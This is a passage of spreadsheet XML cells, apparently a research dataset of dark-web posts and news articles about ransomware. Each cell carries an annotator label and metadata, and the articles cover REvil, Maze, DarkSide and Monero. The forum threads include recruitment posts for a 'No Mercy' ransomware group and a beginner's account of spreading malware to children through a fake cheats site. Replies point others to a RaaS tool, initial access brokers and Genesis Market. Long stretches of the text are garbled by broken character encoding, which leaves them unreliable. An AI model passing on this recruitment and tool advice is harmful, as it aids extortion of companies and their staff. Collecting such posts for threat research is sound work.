canada-based agricultural firm and a food distributor in the united states.;;;what���s the auction procedure?;;concerning the two organizations, the information security and tech news publication site bleeping computer reported that the hacker holds more than three databases with 22,000 files ready for auction ��� with the initial bids being set to begin from between $50,000 and $200,000.;;the auction site has shared a couple of rules regarding the terms and conditions for bidding and paying for stolen data.;;first, for an interested party to bid on an auction, they are expected to make registrations that would be exclusive from one auction to the other.;;following successful registration, the party will be required to deposit funds that will make up 10 percent of the bid���s starting price. this amount will then be refunded sion of the auction ��� save for the resultant blockchain commission.;;the third rule regards unsuccessful bids whereby the site cautions fake bidders ��� parties that will fail to make payments to bids on the winning auction will lose their deposits.;;importantly, the site spells the condition that all computational operations of available auctions will be executed using the monero cryptocurrency (xmr).;;furthermore, the site informs interested bidders that they will be served with credentials and details of deposit payment that will enable successful bidding at the auctions.;;inside revil���s cybercriminal enterprise;;a host of cybersecurity experts have acknowledged the fact that revil has become a force to reckon within the cybercriminal world. the ransomware seems to have revolutionized cybercriminal acumen within the precincts of traditional ransomware applications ��� with revil operators turning out to be highly productive in the international scale.;;in the year 2019, revil wainvolved in cybercriminal attacks targeting more than 23 texas municipalities, 400 dental businesses in the u.s., managed service providers such as cyrusone, and an it solutions firm called complete technology solutions.;;by the end of the same year, this ransomware had attacked travelex in a high profile case that saw the organization paying off the hackers a reported $2.3million in ransom. the cyberattack was said to have severely affected travelex���s sites across the world before the company recovered a month later.;;in conclusion, the reach and impact of revil���s operation has had a tremendous consequence across the world. the economic ramifications of the currently raging covid-19 pandemic seem to have influenced revil operations ��� bids can now determine demand as most organizations are trying so hard n</t>
  </si>
  <si>
    <t>Post regarding Revils aution house for leaked data</t>
  </si>
  <si>
    <t>0b13762841bd33d5f6ac</t>
  </si>
  <si>
    <t>Masterminds Behind REvil Ransomware Auction Stolen Data on the Dark Web</t>
  </si>
  <si>
    <t>{'revil': 5, 'ransomware': 7}</t>
  </si>
  <si>
    <t xml:space="preserve">;read this article on deepwebfeed;;the maze ransomware operators finally announced that they have officially shut down their operations and denies the creation of a cartel. today the maze ransomware gang announced that they have officially shut down their operations, the news was anticipated last week.;;the cybercrime gang announced that it will no longer leak data of new companies infected with their ransomware. it was considered one of the most prominent and active ransomware crew since it began operating in may 2019. the gang was the first to introduce a double-extortion model in the cybercrime landscape at the end of 2019.;;at the end of 2019, the maze ransomware implemented data harvesting capabilities and started threatening the victims to release the stolen data for all those victims who refuse to pay the ransom. the operators behind the maze ransomware set up a leak site, dubbed maze news, where they were publishing the list of the companies that allegedly refused to pay the ransom.;;the leak site contains for each victim the data related to the infection, including the date of the attack, some stolen documents (office, text and pdf files), the size of stolen data, and the list of ip addresses and machine names of the infected servers.;;the maze news site was also and used to publish press releases for the activities of the group. today, maze operators released a press release on their site, the message titled ���the project is closed��� warns that any other ransomware operation that will abuse its brand must be considered a scam.;;���maze team project is announcing it is officially closed. all the links to out project, using of our brand, our work methods should be considered to be a scam. we never had partners or official successors. our specialists do not works with any other software. nobody and never will be able to host new partners at our news website. the maze cartel was never exists [sic] and is not existing now. it can be found only inside the heads of the journalists who wrote list of victims of the gang is long and includes the steel sheet giant hoa sen group, southwire, canon, lg electronics, xerox, and city of pensacola. malware researchers that collaborate with bleeping computer first speculated that other malware, such as egregor and sekhmet ransomware borrows the code from maze ransomware.;;since may, 2020, the maze gang also started publishing information stolen from a different ransomware operation called lockbit, a circumstance that suggested the creation of a cartel with other gangs. the press release published by maze pointed out that ���maze cartel only existed inside the heads of journalists who wrote about </t>
  </si>
  <si>
    <t xml:space="preserve">Article about ransomware group Maze shutting down (important as they were (one of) the first to impliment double extortion tactics </t>
  </si>
  <si>
    <t>6c5f6e686904baf9f5a5</t>
  </si>
  <si>
    <t>Maze Ransomware Gang Shuts Down Operations, States Their Press Release</t>
  </si>
  <si>
    <t>maze ransomware hackers have leaked lg and xerox data after the two firms failed to meet the cybercriminals��� demands;;http://tapeucwutvne7l5o.onion/maze-ransomware-group-leaked-76-gb-worth-of-data-on-the-da</t>
  </si>
  <si>
    <t>Maze releasing stolen data from LG and Xerox</t>
  </si>
  <si>
    <t>98d4d16d7d6abc0cb26d</t>
  </si>
  <si>
    <t>Maze Ransomware Group Leaked 76 GB Worth of Data on the Dark Web</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;microsoft says an iranian state-sponsored threat group it tracks as dev-0270 (aka nemesis kitten) has been abusing the bitlocker windows feature in attacks to encrypt victims' systems.;;redmond's threat intelligence teams found that the group is quick to exploit newly disclosed security vulnerabilities and extensively uses living-off-the-land binaries (lolbins) in attacks.;;this aligns with microsoft's findings that dev-0270 uses bitlocker, a data protection feature that provides full volume encryption on devices running windows 10, windows 11, or windows server 2016 and above.;;"dev-0270 has been seen using setup.bat commands to enable bitlocker encryption, which leads to the hosts becoming inoperable," the microsoft security threat intelligence explained.;;"for workstations, the group uses diskcryptor, an open-source full disk encryption system for windows that allows for the encryption of a device's entire hard drive.";;the time to ransom (ttr) between the initial access and the ransom note being deployed on locked systems was around two days, and dev-0270 has been observed demanding victims to pay $8,000 for decryption keys following successful attacks.;;;moonlighting for personal gain;;redmond says this is a sub-group of the iranian-backed phosphorus cyber-espionage group (aka charming kitten and apt35) known for targeting and collecting intelligence from high-profile victims linked to governments, ngos, and defense organizations worldwide.;;dev-0270 appears to be moonlighting "for personal or company-specific revenue generation," according to a low confidence assessment from microsoft.;;based on "numerous infrastructure overlaps," microsoft says the group is being operated by an iranian company known under two aliases: secnerd (secnerd[.]ir) and lifeweb (lifeweb[.]it).;;;"these organizations are also linked to najee technology hooshmand (�������� �������������" redmond added.;;"the group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.";;since many of dev-0270's attacks have exploited known vulnerabilities in exchange (proxylogon) or fortinet (cve-2018-13379), companies are advised to patch their internet-facing servers to block exploitation attempts and subsequent ransomware attacks.;;similar malicious activity linked to a threat group secureworks tracks as cobalt mirage (with elements overlapping the phosphorus apt group) was reported by secureworks' counter threat unit (ctu) in may.;;;https://securityaffairs.co/wordpress/135511/apt/dev-0270-abuses-bitlocker-attacks.html;;https://gadgetgrapevine.com/microsoft-iranian-hackers-use-bit-locker-to-encrypt-windows-systems/</t>
  </si>
  <si>
    <t>Microsoft claiming an Iranian hacker group encrypted victums systems using BitLocker ransomware</t>
  </si>
  <si>
    <t>4be158b377673b175308</t>
  </si>
  <si>
    <t>Microsoft: Iranian hackers encrypt Windows systems using BitLocker</t>
  </si>
  <si>
    <t>ransomware must be a great hustle.</t>
  </si>
  <si>
    <t>user stating ransomware must be very profitable</t>
  </si>
  <si>
    <t>/u/taigahunter</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;criminal use of the monero cryptocurrency is expected to increase significantly in the future, justin ehrenhofer, a member of the coin's development community has told newsweek.;;source: msn / newsweek;;the use of cryptocurrency in cybercrime has risen to prominence in recent weeks following the colonial pipeline hack in may, which forced pipeline officials to pay a bitcoin ransom worth $4.4 million. the fbi later confirmed a criminal organization known as darkside was responsible for the attack.;;last week, u.s. deputy attorney general lisa monaco announced the u.s. had recovered $2.3 million worth of the bitcoin ransom after the fbi managed to trace it to a particular wallet and gain possession of the key. it is still unclear how the fbi got the key.;;the incident has led some analysts to discuss other types of cryptocurrency tokens that could be more difficult for law enforcement to trace in future. glen goodman, author of the crypto trader, told newsweek there are "more anonymous coins like monero which are hard to trace.";;rick holland, chief information security officer at the digital shadows cyberthreat intelligence firm, told cnbc on sunday: "the more savvy criminals are using monero." cnbc reported hackers are increasingly turning to such coins because of the anonymity they offer.;;ehrenhofer, a developer within the monero space workgroup, told newsweek he and other developers are not surprised this is the case. "monero is increasingly used for ransomware payments," he said. "in 2020 and 2021, the adoption of monero increased significantly. we saw a large influx of people using monero to transact in all sorts of commerce.;;"criminals and non-criminals alike enjoy using monero because it's private, fungible money. "while we are disappointed that ransomware groups increasingly demand payment in monero, we understand why they do, and we expect them to use monero significantly more in the future.";;ehrenhofer said that some criminal organizations actually offer a discount of between 10 and 20 percent if they are paid in monero, and expects many will stop accepting bitcoin altogether for smaller ransoms. "bitcoin is far more public than most people realize," he said. "good money in the view of monero contributors does not leak all transaction information to the public, including attackers, foreign governments, and advertising agencies.";;even so, ehrenhofer claimed criminal activity makes up "a tiny minority of monero's total network activity," with most of it instead relating to speculation. "of course, cryptocurrencies do not cause ransomware," he said. "the recent increase in ransomware is due to a variety of factors, including increased cryptocurrency liquidity, substantially more common cybersecurity insurance, and state-sponsoring of attacker groups.";;goodman said monero's anonymity comes from various techniques used by the underlying software, including "stealth addresses," which make it almost impossible to track a given user's spending. he said: "it mixes different people's transactions together so that no outside observer can tell which user is which and how much is being spent.";;monero is currently worth around $277, up 4.1 percent on the day, according to coinmarketcap. it has declined in price from early may when it was briefly worth over $500.</t>
  </si>
  <si>
    <t>Article stating that Monaro developer expects that more criminal groups such as ransomware will use monaro for ransoms</t>
  </si>
  <si>
    <t>20/06/2021 21:29</t>
  </si>
  <si>
    <t>58e25d3aba5eba348cff</t>
  </si>
  <si>
    <t>Monero Developer Expects More Criminal Groups to Use the Crypto for Ransoms</t>
  </si>
  <si>
    <t>0 days 02:44:00</t>
  </si>
  <si>
    <t>{'darkside': 1, 'ransomware': 3}</t>
  </si>
  <si>
    <t>in your opinion, what is the most profitable malware to write, whether that be people buying it or stealing money with it?</t>
  </si>
  <si>
    <t>User asking opinions on what is the most profitable malware</t>
  </si>
  <si>
    <t>/u/tokyo192</t>
  </si>
  <si>
    <t>5893ccf4e5ab4952d1ed</t>
  </si>
  <si>
    <t>Most Profitable Malware?</t>
  </si>
  <si>
    <t>43 days 07:33:00</t>
  </si>
  <si>
    <t>ransomwares and bitcoin clippers</t>
  </si>
  <si>
    <t>/u/cutletmaker</t>
  </si>
  <si>
    <t>people really need to understand what they are doing. they think it is as simple as buying a ransomware software or some shit and getting millions from a random company. you will have a much more difficult time if you approach it with the sole intent of making money.</t>
  </si>
  <si>
    <t>/u/eccorealize</t>
  </si>
  <si>
    <t>0 days 00:27:00</t>
  </si>
  <si>
    <t>**i want write i am on my begin in hacking i try learn every new day more and more**;what is your opinion about, most simplest target to hack and earn some bucks;;for example;-its find vulnerable site to sql or xss attack ( i was found many times with google dorks site which was vulnerable to sql, i get and write email to owner they don't reply );-phishing  some accounts like facebook and etc ( i was very naive and i think there can be something valuable );-open botnet ?;-start mining on hacked rdp and etc ( probably i need more than thousands pc to have profitable minning right ? );-create fud ransomware ( use some crypter,but on which corporate send it also ransomware which i use is some free tool on github );-i was too make own smtp server with cyberpanel and i hit emails on delivery and not spam and try spam and phishing no result;-i try focused on social engineering,because human brain its most vulnerable device;-hack pc and use their network to attack some site where is money ? like online casino,online betting and other stuff;;--------------------------------------------------------------------------------------------------------;for example i was cloned some site for download hacks in favorite games;- i was make almost fud malware 2/24;- site was look good;- but how get people on your site ( for this example i was target kiddos );- because i don't want use my card to buy ads on google/youtube even facebook;- i try use someone card,but i was declined;- so i create social media account like tiktoc;- i was convert videos on youtube where people use nice aim bot;- cut is on popular tiktok music;- i was get result like 1k views per day on single video,but nobody download my software;- also later i was realized kiddos doesn't have money;- so i ruined my plans and was stuck on same place,because i cannot choice what best for noob like me;;be honest  learning about hacking  its sometimes for me really complicated;because i cannot hold attention more than 15min on some leaked course;when i read books i again cannot hold attention,max for few pages;so for this reason i was learn pre-installed tools on kali with practical,i am like just script kiddie;;could you help me please ? its better when i give up,hacking and i start focusing on something else ?;when i was start with learning linux i have my goals after i explore more and more stuff i am more and more confused;;also i understand hacking its not something easy and its need time to learn and understand;i want thanks for your time to reply,also i was more happy when somebody can chat with me for someone for while and give me some info which help me move;;and i am worried  when i start learn one programming language, i think best what i can choice its python,but i am not sure how hold on attention;i have in my head so much louder minds than my voice</t>
  </si>
  <si>
    <t>User asking what are simple targets to hit regarding ransomware</t>
  </si>
  <si>
    <t>0e37dd8c99c5146940f2</t>
  </si>
  <si>
    <t>Most simple target</t>
  </si>
  <si>
    <t>2 days 08:42:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;ransomware-as-a-service could become a major threat, warns blackberry researchers. security researchers have warned of a new strain of ransomware that uses affiliates to spread the malware.;;in a blog post, researchers at blackberry said that mountlocker has been available as ransomware as a service since july and was updated in november to broaden the file types it targeted and evade security software. the malware itself, at less than 100kb in size, is lightweight and simple in construction. it is typically deployed as either an x86 or x64 windows portable executable (pe) file, although occasionally as a microsoft installer (msi) package.;;the ransomware encrypts data of victims and demands bitcoin as ransom. the hackers also threaten to leak stolen information if money is not received.;;blackberry researchers said that the ransomware uses an affiliate scheme to find victims. its investigations found that threat actors often used remote desktop (rdp) with compromised credentials to gain access to a victim���s environment. in one instance, after establishing a foothold in an organisation, there was a delay of several days before activity resumed.;;���it is likely that the threat actors were negotiating with the mountlocker operators to join their affiliate program and obtain the ransomware during this pause. upon obtaining the mountlocker ransomware, the threat actors were observed returning with several ���public��� tools, including cobaltstrike beacon and adfind from joeware,��� researchers said.;;blackberry noted that only five victim"news &amp; leaks" site hosted on the darknet, but are likely to increase. researchers said that the operators behind mountlocker are ���clearly just warming up"after a slow start in july, they are rapidly gaining ground, as the high-profile nature of extortion and data leaks drive ransom demands ever higher. mountlocker affiliates are typically fast operators, rapidly exfiltrating sensitive documents and encrypting them across key targets in a matter of hours,��� they</t>
  </si>
  <si>
    <t>MountLocker raas becomes avaliable to criminal affiliates</t>
  </si>
  <si>
    <t>20/12/2020 00:07</t>
  </si>
  <si>
    <t>858a6598dd76cfbe9e05</t>
  </si>
  <si>
    <t>MountLocker Ransomware Now Working Through Criminal Affiliates</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 5}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a hacking group going by the name darkside has reportedly tried to donate around $20,000 in stolen bitcoin to charity. the gang posted receipts for two $10,000 bitcoin donations to the water project and children international on a dark web blog post, the bbc reported along with screenshots of the transactions.;;bitcoin and cryptocurrencies are often used by cyber criminals to extort victims thanks to their semi-anonymous nature. ransomware attacks, where victims' files are encrypted and only unlocked if bitcoin or other cryptocurrencies are paid to hackers, have become a common tool of cyber criminals in recent years.;;darkside hackers, who formed their seemingly sophisticated ransomware operation over the summer, say they want to "make the world a better place" after claiming to have extorted millions of dollars from companies. "we think that it's fair that some of the money the companies have paid will go to charity," an october 13 blog post read, according to the bbc. "no matter how bad you think our work is, we are pleased to know that we helped changed someone's life.";;children international, speaking to the bbc, said it will not be keeping the money. "if the donation is linked to a hacker, we have no intention of keeping it," a children international spokesperson said. the donations were made via bitcoin and cryptocurrency donation platform the giving block, which it shared in a now deleted tweet.;;the give-away has baffled analysts who have struggled to understand the motivation behind the donations: "what the criminals hope to achieve by making these donations is not at all clear," brett callow, threat analyst at cyber-security company emsisoft, told the bbc. "perhaps it helps assuage their guilt? or perhaps for egotistical reasons they want to be perceived as robin hood-like characters rather than conscienceless extortionists.";;it's not the first time computer hackers have tried to put their illicit gains toward a good cause, however.;;in 2016, an anonymous hacker going by the pseudonym phineas fisher reportedly donated 25 bitcoin, worth around $11,000 at the time and apparently stolen from a bank, to kurdish anti-capitalists in syria who were at the time fighting the islamic state militant group isis.</t>
  </si>
  <si>
    <t>Article regarding darkside attempting to donate a large amount of stolen bitcoin to charity</t>
  </si>
  <si>
    <t>28/10/2020 13:37</t>
  </si>
  <si>
    <t>a92cef561d1f45cf2f94</t>
  </si>
  <si>
    <t>Mystery ���Robin Hood��� Hackers Are Giving Away St</t>
  </si>
  <si>
    <t>342 days 11:09:00</t>
  </si>
  <si>
    <t>{'darkside': 1, 'ransomware': 2}</t>
  </si>
  <si>
    <t>phineas fisher bank heist can be found here and how they did it: http://libraryqxxiqakubqv3dc2bend2koqsndbwox2johfywcatxie26bsad.onion/library/subcowmandante-marcos-hack-back</t>
  </si>
  <si>
    <t>Information regarding the Phineas Fisher bank heist</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the new york police department (nypd) has been using chainalysis software to conduct blockchain investigations since 2019.;;though nypd���s blockchain sleuthing efforts had been reported by the block in january, it was not previously known which firm the nation���s largest police force had enlisted to help track suspect crypto transactions or how long it had been doing so.;;the revelation comes as the nypd quietly strengthens its rules governing who can use the cryptocurrency analysis tools and how the department stores the transaction data their investigations dig up. under a final policy document released sunday, new york cops said they would only use the tools for ���legitimate law enforcement purposes��� pre-authorized by an oversight board. a draft policy proposed in january would have permitted those tools ���in any situation��� the oversight board had seen fit.;;additionally, officers must now have ���an articulable need��e they���re allowed to use the agency���s tools. the previous proposal appeared to grant access to any ���authorized user��� with a username and password.;;chainalysis has established itself as one of law enforcement���s top allies in tracking cyber criminals who conduct business on public ledgers. the firm raked in $10 million in federal government contracts in 2020, but the company has told coindesk it maintains broad relationships with state and local police.;;for its work with the nypd, chainalysis received an eight-month, $35,410 software licensing contract in october 2019. the new york-based firm subsequently agreed to a full-year deal worth $67,890 that granted nypd use of its ���intelligence collection tool.��� that deal will expire at the end of august.;;nypd first divulged its crypto tracing policies in response to a june 2020 state law that sought to give the public more input on its high-tech toolkit. but the department had already been surveilling transac records reviewed by coindesk.;;nypd did not respond to requests for comment.;;;blockchain cops;;chainalysis, one of the largest private companies providing cryptocurrency tracing software to governments and crypto exchanges alike, last month raised a whopping $100 million from prominent backers. chainalysis public sector vp chris manouse told coindesk that local law enforcement agencies rely on transaction-tracing software to respond to cyber threats.;;���criminal activity involving cryptocurrency is directly impacting local communities,��� he said in an email. ���ransomware is crippling local hospitals, schools, and governments. individuals, including the elderly, are being targeted in scams and sim swaps.���;;manouse declined to comment on chainalysis��� relationship with nypd. in 2019 the department warned that scammers posing as social security administrators had bilked city residents of $2 million in bitcoin, gift cards and wire transfers.;;nypd training records reviewed byents��� crypto investigations may stretch beyond ransomware and sim swaps. the 2020 detective training coursebook offered lectures on managing darknet investigations.;;;policy risks;;albert fox cahn, the founder and executive director of the new york city-based surveillance technology oversight project (stop), said the nypd approach reeks of overreach.;;���this is a policy that���s designed to hide more than it shows,��� cahn said in a phone call. ���the policy doesn���t specify what vendor it uses, it doesn���t specify the capabilities being deployed, it gives the most high-level cryptic description you could imagine of the cryptoc</t>
  </si>
  <si>
    <t>Article regarding blockchain investigations by law enforcement, stating it may go beyond ransomware</t>
  </si>
  <si>
    <t>26/04/2021 19:26</t>
  </si>
  <si>
    <t>2b21cb56495061e1d477</t>
  </si>
  <si>
    <t>NYPD���s Crypto Sleuthing Is Powered by Chain</t>
  </si>
  <si>
    <t>hi there, i'm dadylovesweed07.. founder/creator of the no mercy ransomware group, and we are looking for hackers,network experts,programmers,more is listed below.;;so before talking further let me introduce myself and the group.. starting with me i'm dadylovesweed07 founder/creator of the no mercy ransomware group. i have a experience of 5 to 5 and a half years in red teaming, pentesting,social engineering,etc..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 nor make people starve and make them live below poverty line by targeting charitable organizations.if the company/organizations which we have compromised/targeted satisfies our needs which is paying the ransom.. we will hand over the decryption tool. there's nothing personal it's strictly business..;;;we are looking for these kind of people listed below.;;1st:- programmers/developers. who can code ransomware's, malware's, etc for the group.;;2nd:- web developers. who can code websites for the group and maintain it.;;3rd:- social engineering:- who can help the group with their social engineering skills to compromise employees, etc.;;4th: the skilled sections:-  pentester's,red teaming experts, reverse engineers and networking experts.;;so what will we offer you?;-money is the only thing which i can offer you!;;so how should i contact you?;- just pm me and i'll try to respond asap.;;;thank you for your time, stay safe and have a great day!</t>
  </si>
  <si>
    <t>Nomercy ransomware group advertising themselves</t>
  </si>
  <si>
    <t>15/11/2021 20:04</t>
  </si>
  <si>
    <t>b2118158e31f04821bab</t>
  </si>
  <si>
    <t>Need Hackers,programmers,etc for Ransomware Group!</t>
  </si>
  <si>
    <t>0 days 03:56:00</t>
  </si>
  <si>
    <t>15/11/2021 20:23</t>
  </si>
  <si>
    <t>07c92e544e1ed3d2dd6e</t>
  </si>
  <si>
    <t>1 days 14:09:00</t>
  </si>
  <si>
    <t>thanks to https://github.com/leonv024/raasnet i am my own group :)</t>
  </si>
  <si>
    <t>15/11/2021 20:33</t>
  </si>
  <si>
    <t>you'll want to look for initial access brokers to get the access to deploy your raas. work on that by networking within the scene.;;i like the genesis market personally. was used in the ea games company data breach.</t>
  </si>
  <si>
    <t>15/11/2021 20:34</t>
  </si>
  <si>
    <t>myself and a few of my buddies would be down. we are all dod trained with a handful of years experience. i'm personally a networking and servers kinda guy but posses many other talents as well as all my buddies do.  if you're interested pm me we can arrange something.</t>
  </si>
  <si>
    <t>/u/Rud2k</t>
  </si>
  <si>
    <t>16/11/2021 06:17</t>
  </si>
  <si>
    <t>0 days 09:43:00</t>
  </si>
  <si>
    <t>there's no excuse for doing this. no matter what excuses you tell yourself, at the end of the day you're stealing money that doesn't belong to you. stuff like this has led to mass layoffs. you're fucking with people's lives here.;;surely someone with this level of cybersecurity skill can find other ways to earn money that doesn't ruin people's lives. if you're telling yourself that you're helping businesses by forcing them to be better about security, you're pathetic. you can always contact a business themselves with your findings, and who knows, you might even get a real job...</t>
  </si>
  <si>
    <t>/u/metapricey27</t>
  </si>
  <si>
    <t>16/11/2021 08:56</t>
  </si>
  <si>
    <t>0 days 02:39:00</t>
  </si>
  <si>
    <t>18/11/2021 15:20</t>
  </si>
  <si>
    <t>0499e7a4527b9544da28</t>
  </si>
  <si>
    <t>please see;/d/jobs4crypto;.</t>
  </si>
  <si>
    <t>18/11/2021 16:14</t>
  </si>
  <si>
    <t>da3973ac0a25483d17d1</t>
  </si>
  <si>
    <t>0 days 00:59:00</t>
  </si>
  <si>
    <t>0 days 02:57:00</t>
  </si>
  <si>
    <t>hi there, i'm dadylovesweed07.. founder/creator of the no mercy ransomware group, and we are looking for hackers/pentesters,network experts.;;so before talking further let me introduce myself and the group.. starting with me i'm dadylovesweed07 founder/creator of the no mercy ransomware group. i have a experience of 5 to 5 and a half years in red teaming, pentesting,social engineering,etc..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 nor make people starve and make them live below poverty line by targeting charitable organizations.if the company/organizations which we have compromised/targeted satisfies our needs which is paying the ransom.. we will hand over the decryption tool. there's nothing personal it's strictly business..;;;we are looking for these kind of people listed below.;;1st:- programmers/developers. who can code ransomware's, malware's, etc for the group.;;2nd:- social engineering:- who can help the group with their social engineering skills to compromise employees, etc.;;4th: the skilled sections:- pentester's and networking experts.;;additional people required:-;;5:- people who can code website for the group and maintain it for us.;;so what will we offer you?;-money is the only thing which i can offer you!;;so how should i contact you?;- pm me or just drop a comment below.;;;thank you for your time, stay safe and have a great day!;;;;;;russian version of this post:-;;������������,  ����������������� / ������������������ the no mercy ransomware group, �� ���� �������� �������������� / ����������������������, �������������� ������������������.;��������, ������������ ������ ���������������� ������������, ������������������ ������ �������������������������� �� ������������ .. ������������ ���� ��������, �� �������������������� / ������������������ dadylovesweed07 ������������ no mercy ransomware group. �� �������� ���� 5 ���� 5 �� ������������������ ������ ���������� �� red teaming, pentesting, �������������������� ������������������ �� ��. ��. �� ���������� �������� �������������� �� ������������������ �� ���������� �������������� ����������������, �� ������������ ������ �������� ����������������.;;�� ������������ ����������������-���������������������� no mercy: - ������������������-�������������������� no mercy - ������ �������������������� ���������� ������������, �������������� ���������� ������������������ ���� ������������ ���������� .. �� ��������������������������, ���� ���������������� �� ���������������� ������������ �� ��������. �������� �������������� �������� - ������������������������ ������������! , ���� ���� ���������������� ���� ���������������������� / ������������������ ���� ������������������ ���������������������� / ����������������, ������������������ ���� �������������������������� ���������������� �������������� ���������� ���� ���������� ���������� �� ���������������� ���������������������������� �������������������������� ����������������. ���� ���������� ���� ���������������� ���� �������������� ������������������������������ ����������������������������. ���������������������������������� ����������������������. �������� �������������� �������� - �������������� ������, ���������� ������������, ���������� ���� ���������������� ���������� ����������, ���� ���������������� �������� ���������������� ������������������������������ ������������������������������, ���� �������������������� ���������� ���������������� �� ���� �������������������� ���� �������� ���� ������������ ����������������, ������������������������ ���� ���������������������������������� ����������������������. �������� ���������������� / ����������������������, �������������� ���� ���������������������������������� / ����������������, �������������������������� �������� ����������������������, �������������� ������������ ���������� .. ���� ���������� ���������� �������������������� ������������������������. ������������ ��������������, ������ ������������ ������������ ..;;���� �������� ���������� ����������, �������������������������� ��������.;;1-��: - ������������������������ / ������������������������. ������ ���������� �������������������� ������������������-��������������������, ���������������������� ������������������ �� ��. ��. ������ ������������.;;2-��: - �������������������� ������������������: - ������ ���������� ������������ ������������ ������������ ���������������� �������������������� ������������������ ���������������������������������� ���������������������� �� ��. ��.;;4-��: ���������������������������������� ��������������: - �������������������� �� �������������� ����������������.;;������������������ ���������������������������� ��������: -;;5: - ��������, �������������� ���������� �������������������� ������-�������� ������ ������������ �� ������������������������ ������ ������ ������.;;��������, ������ ���� ������ ������������������?;-������������ - ������ ������������������������, ������ �� �������� ������ ��������������������!;;��������, ������ ������ �� �������� ������������������?;-������������������ ������ ������������������ ���������� ������ ���������������� ���������������������� ��������.;;;�������������� ���� ������������������ ����������. ���������������� ������!</t>
  </si>
  <si>
    <t>27/11/2021 07:28</t>
  </si>
  <si>
    <t>a3c992d08aaf11a1370c</t>
  </si>
  <si>
    <t xml:space="preserve">Need Hackers/pentesters,network experts,etc for Ransomware Group! / ���������� �������������������� </t>
  </si>
  <si>
    <t>204 days 06:54:00</t>
  </si>
  <si>
    <t>/d/jobs4crypto</t>
  </si>
  <si>
    <t>27/11/2021 16:41</t>
  </si>
  <si>
    <t>0 days 05:24:00</t>
  </si>
  <si>
    <t>we do not target medical/health related organizations/company's as we truly understand the impact of it on peoples lives with the on going pandemic situation;then don't scam people. you're inevitably going to put people's lives in danger by stealing their money. just because it's not a healthcare/charity organization doesn't mean it doesn't impact people's lives. or don't be hypocritical and admit you don't care.</t>
  </si>
  <si>
    <t>/u/OlLFY3yXUSep</t>
  </si>
  <si>
    <t>29/11/2021 18:55</t>
  </si>
  <si>
    <t>2 days 00:53:00</t>
  </si>
  <si>
    <t>im interested pm me on telegram @buduchop;please im waiting for a reply.;be safe</t>
  </si>
  <si>
    <t>/u/Aminj35</t>
  </si>
  <si>
    <t>19/06/2022 14:22</t>
  </si>
  <si>
    <t>201 days 19:27:00</t>
  </si>
  <si>
    <t>hi there, i'm dadylovesweed07.. founder/creator of the no mercy ransomware group, and we are looking for experienced pentesters..;;so before talking further let me introduce myself and the group.. starting with me i'm dadylovesweed07 founder/creator of the no mercy ransomware group. i have a experience of 5 to 5 and a half years in offencive security..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infrastructures.if the company/organizations which we have compromised/targeted satisfies our needs which is paying the ransom.. we will hand over the decryption tool. there's nothing personal it's strictly business..;;;we are looking for pentesters who are skilled.;;so what will we offer you?;-money is the only thing which i can offer you!;;so how should i contact you?;- just pm me and i'll try to respond asap.;;;thank you for your time, stay safe and have a great day!</t>
  </si>
  <si>
    <t>19/01/2022 17:57</t>
  </si>
  <si>
    <t>304f3281501c8eba4e14</t>
  </si>
  <si>
    <t>Need Pentesters for Ransomware Group!</t>
  </si>
  <si>
    <t>3 days 23:46:00</t>
  </si>
  <si>
    <t>hello!;;;no mercy ransomware is a totally new group which stands apart from other groups out there;;could you please elaborate on the factors which make you stand out?</t>
  </si>
  <si>
    <t>19/01/2022 18:26</t>
  </si>
  <si>
    <t>0 days 00:29:00</t>
  </si>
  <si>
    <t>interested. pmm me</t>
  </si>
  <si>
    <t>/u/n3v3rSURHAND</t>
  </si>
  <si>
    <t>19/01/2022 19:27</t>
  </si>
  <si>
    <t>whats the cut for affiliates?</t>
  </si>
  <si>
    <t>/u/patron_saint_of_phishers</t>
  </si>
  <si>
    <t>19/01/2022 19:46</t>
  </si>
  <si>
    <t>0 days 00:19:00</t>
  </si>
  <si>
    <t>it will depend on in which team you are in like are you in "ransomware and malware dev team" or the "core team"(pentesters team). and also depends on what task have been given to.</t>
  </si>
  <si>
    <t>20/01/2022 11:41</t>
  </si>
  <si>
    <t>most ransomware groups buy access form others and then give a huge % of the ransom to them. and if you don't have access they are not interested in you. if you want to work with them you gotta pay huge deposit.. it could vary depending upon the group.;;but no mercy don't charge any thing from their affiliates at all and does everything on their own and keeps the profit among ourselves.</t>
  </si>
  <si>
    <t>21/01/2022 11:57</t>
  </si>
  <si>
    <t>1 days 00:16:00</t>
  </si>
  <si>
    <t>i'm still confused on the model. if you don't charge anything from the affiliates that means they keep 100% of the ransom, and if you don't require a deposit then... you're technically giving away a locker for free without any obligations?</t>
  </si>
  <si>
    <t>21/01/2022 12:29</t>
  </si>
  <si>
    <t>no, i'm not giving away a locker for free.. i've come up a new model so yeah it could be tough to understand at first.. but once understood it isn't that complicated.</t>
  </si>
  <si>
    <t>22/01/2022 19:03</t>
  </si>
  <si>
    <t>1 days 06:34:00</t>
  </si>
  <si>
    <t>well, no offense but you're not making it easy to understand. and you did present it like some revolutionary model so users like me are bound to be curious.</t>
  </si>
  <si>
    <t>22/01/2022 22:12</t>
  </si>
  <si>
    <t>0 days 03:09:00</t>
  </si>
  <si>
    <t>my bad.. i'll try making it more clear and easy for people to understand next time :)</t>
  </si>
  <si>
    <t>23/01/2022 17:43</t>
  </si>
  <si>
    <t>0 days 19:31:00</t>
  </si>
  <si>
